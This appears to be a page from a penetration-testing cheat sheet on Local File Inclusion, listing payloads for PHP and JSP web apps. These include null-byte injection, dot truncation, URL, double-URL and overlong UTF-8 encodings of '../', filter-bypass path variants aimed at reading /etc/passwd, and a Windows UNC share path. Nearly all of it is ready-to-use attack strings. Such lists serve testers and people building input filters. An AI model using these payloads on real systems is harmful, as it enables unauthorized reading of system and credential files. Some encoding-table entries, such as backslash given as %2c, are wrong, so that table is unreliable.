LFI


NULL CARACTER:
Sometimes applications append extra characters, like file extensions, to the input variable. A null byte will make the application ignore the following characters.

original→ index.php?somefile=image.jpeg
testing → index.php?somefile=../../../../etc/passwd%00image.jpeg

Note: PHP fixed the issue in version 5.3.4. https://bugs.php.net/bug.php?id=39863

===========================================================

Dot Truncation #
In PHP, filenames longer than 4096 bytes will be truncated and, characters after that, ignored.

http://example.com/index.php?page=../../../etc/passwd................[ADD MORE]
http://example.com/index.php?page=../../../etc/passwd\.\.\.\.\.\.\.\.[ADD MORE]
http://example.com/index.php?page=../../../etc/passwd/./././././././.[ADD MORE]
http://example.com/index.php?page=../../../[ADD MORE]../../../../../etc/passwd

Note: In PHP: /etc/passwd = /etc//passwd = /etc/./passwd = /etc/passwd/ = /etc/passwd/

=======================================================


Encoding 
Manipulating variables that reference files with “dot-dot-slash" (../) sequences and its variations, or using absolute file paths, may allow bypassing poorly implemented input filtering.

					URL					Double URL				UTF-8 Unicode																16 bits Unicode
.					%2e					%252e					     %c0%2e 		%e0%40%ae	 %c0%ae							%u002e
/					%2f					%252f						%c0%2f		%e0%80%af 	 %c0%af							%u2215
\					%2c					%252c						%c0%5c 		%c0%80%5c	 										%u2216



Encoded ../:

%2e%2e%2f
%252e%252e%252f
%c0%ae%c0%ae%c0%af
%uff0e%uff0e%u2215



Encoded ..\:
%2e%2e%2c
%252e%252e%252c
%c0%ae%c0%ae%c0%af
%uff0e%uff0e%u2216



Double URL Encoding :

http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd


UTF-8 Encoding:

http://example.com/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd



Bypass Filtering:
http://example.com/index.php?page=....//....//etc/passwd
http://example.com/index.php?page=..///////..////..//////etc/passwd
http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd


Bypass ../ removal:
..././
...\.\


Bypass ../ replaced with ;:
..;/
http://example.com/page.jsp?include=..;/..;/sensitive.txt




Windows UNC Share:

Windows UNC shares can be injected to redirect access to other resources.

\\localhost\c$\windows\win.ini

PreviousWeb Site Exploitation VectorsNextConfig Files

Last updated